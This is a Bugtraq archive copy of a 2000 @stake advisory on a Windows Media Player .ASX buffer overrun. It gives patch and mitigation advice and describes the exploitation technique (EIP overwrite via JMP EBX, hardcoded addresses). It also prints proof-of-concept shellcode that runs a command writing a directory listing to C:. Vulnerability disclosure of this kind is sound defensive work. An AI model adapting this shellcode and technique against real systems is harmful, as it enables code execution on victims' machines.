Home page logo

bugtraq logo Bugtraq mailing list archives

@stake Advisory: Windows 2000 .ASX Buffer Overrun (A112300-1)
From: "@stake Advisories" <advisories () ATSTAKE COM>
Date: Thu, 23 Nov 2000 10:46:11 -0500

Hash: SHA1

                              @stake Inc.

                           Security Advisory

Advisory Name: Windows 2000 .ASX Buffer Overrun
 Release Date: 11/23/2000
  Application: Microsoft Windows Explorer with
               Microsoft Media Player v6.xx and
               Microsoft Media Player v7.xx.
     Platform: Windows 2000 SP1
     Severity: There is a buffer overflow condition that
               can result in execution of arbitrary code.
      Authors: Ollie Whitehouse [ollie () atstake com]
Vendor Status: vendor has released patch
          Web: www.atstake.com/research/advisories/2000/a112300-1.txt


        Microsoft Windows Media Player (http://www.microsoft.com/) plays
streaming media files which have the extension .ASX. There is a buffer
overrun caused by the way that WMP deals with the .ASX file format when
using the Web View option in Windows Explorer (enabled by default). This
problem can allow the execution of arbitrary computer code.

One method of exploitation requires the user to save the .ASX file down to
the local machine and navigate to it via Explorer. Single clicking once on
the file will cause Explorer to Auto-Preview the destination streaming
media file which is specified in the .ASX file.  Passing an overly long
destination to this media file will cause the buffer overrun to occur and
the abtirary code to execute.

This is another good example of why attachments from unknown sources
should not be trusted. Also why systems/network administrators should
evaluate the types of attachments which are allowed to be passed to users
desktops even though they may not contain any executable code.

There are other methods of exploitation which could allow .ASX files to be
opened automatically when a user visits a malicious web site.  This can be
prevented by configuring Internet Explorer not to run ActiveX controls.

Proof of Concept:

        The following file once uncompressed contains
'Explorer-Win2k-BufferOverrun.asx'. Once this file is previewed within
Explorer with a single click, it will cause Microsoft Explorer to create a
file in the root of C:  called !test!. This file will contain a directory
listing of the current working directory when the proof of concept is
executed. Once this proof of concept is executed it will require
Explorer.exe to be restarted.

This example has been hardcoded to work with Windows 2000 (SP1) and
MSVCRT.DLL v6.1.8637. Another reason why this example is service-pack
specific is that the code is randomly located on the stack (so EIP can not
be pointed directly to the location of the arbitray code), EBX is located
4 bytes before EIP. The example overwrites EIP with the address of JMP EBX
(FF E2, this instruction is contained in kernel32 and thus static).  This
in turn then tries to execute the value at EBX (which containes NOPs),
then EIP (luckly this does not contain any code which alters or stops
program flow) and then finally executes the arbitry code placed on the
stack.  The assembly code which is executed by this example at this point
is contained at the end of this advisory. Within the ASX file the example
code is contained at offset 00005ce4h.

Proof of concept ASX File:

An ASX file which contains the problem is contained in this .zip file:


<-----<Assembly code for proof of concept>-----
[Byte Code]                [Assembly]
90                         nop
8B DC                mov         ebx,esp
8B E3                mov         esp,ebx
53                   push        ebx
8B DC                mov         ebx,esp
33 FF                xor         edi,edi

57                   push        edi
57                   push        edi
57                   push        edi
57                   push        edi
57                   push        edi
57                   push        edi
57                   push        edi

C6 43 E9 63          mov         byte ptr [ebx-17h],63h
C6 43 EA 6D          mov         byte ptr [ebx-16h],6Dh
C6 43 EB 64          mov         byte ptr [ebx-15h],64h
C6 43 EC 2E          mov         byte ptr [ebx-14h],2Eh
C6 43 ED 65          mov         byte ptr [ebx-13h],65h
C6 43 EE 78          mov         byte ptr [ebx-12h],78h
C6 43 EF 65          mov         byte ptr [ebx-11h],65h
C6 43 F0 2F          mov         byte ptr [ebx-10h],2Fh
C6 43 F1 63          mov         byte ptr [ebx-0Fh],63h
C6 43 F2 64          mov         byte ptr [ebx-0Eh],64h
C6 43 F3 69          mov         byte ptr [ebx-0Dh],69h
C6 43 F4 72          mov         byte ptr [ebx-0Ch],72h
C6 43 F5 3E          mov         byte ptr [ebx-0Bh],3Eh
C6 43 F6 63          mov         byte ptr [ebx-0Ah],63h
C6 43 F7 3A          mov         byte ptr [ebx-9],3Ah
C6 43 F8 5C          mov         byte ptr [ebx-8],5Ch
C6 43 F9 21          mov         byte ptr [ebx-7],21h
C6 43 FA 74          mov         byte ptr [ebx-6],74h
C6 43 FB 65          mov         byte ptr [ebx-5],65h
C6 43 FC 73          mov         byte ptr [ebx-4],73h
C6 43 FD 74          mov         byte ptr [ebx-3],74h
C6 43 FE 21          mov         byte ptr [ebx-2],21h

B8 AD AA 01 78       mov         eax,7801AAADh
50                   push        eax
8D 43 E9             lea         eax,[ebx-17h]
50                   push        eax
FF 53 E4             call        dword ptr [ebx-1Ch]
56                   push        esi

BB 2D F3 E8 77       mov         ebx,77E8F32Dh
FF D3                call        ebx
C3                   ret
<-----<End of code for proof of concept>-----

Vendor Response:
Microsoft has released a security bulletin describing the issue:


Microsoft has release patches for Windows Media Player:

 Windows Media Player 6.4:

 Windows Media Player 7:


The best solution is to install the vendor patch for your version of the
media player.  This solves this specific problem.

In general, unless you need to run ActiveX controls, it is a good idea to
configure Internet Explorer not to run them.  At the very least you can
configure IE to not run ActiveX controls in the Internet Security Zone.
It doesn't matter whether the controls are signed or not.  As you can see
from this advisory even signed controls can have security problems.

Of course, never trust attachments from unknown sources, even data files
such as the .ASX files discussed in this advisory.
For more advisories: http://www.atstake.com/research/advisories/
PGP Key: http://www.atstake.com/research/pgp_key.asc

Copyright 2000 @stake, Inc. All rights reserved.

Version: PGP 7.0


  By Date           By Thread  

Current thread:
  • @stake Advisory: Windows 2000 .ASX Buffer Overrun (A112300-1) @stake Advisories (Nov 24)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]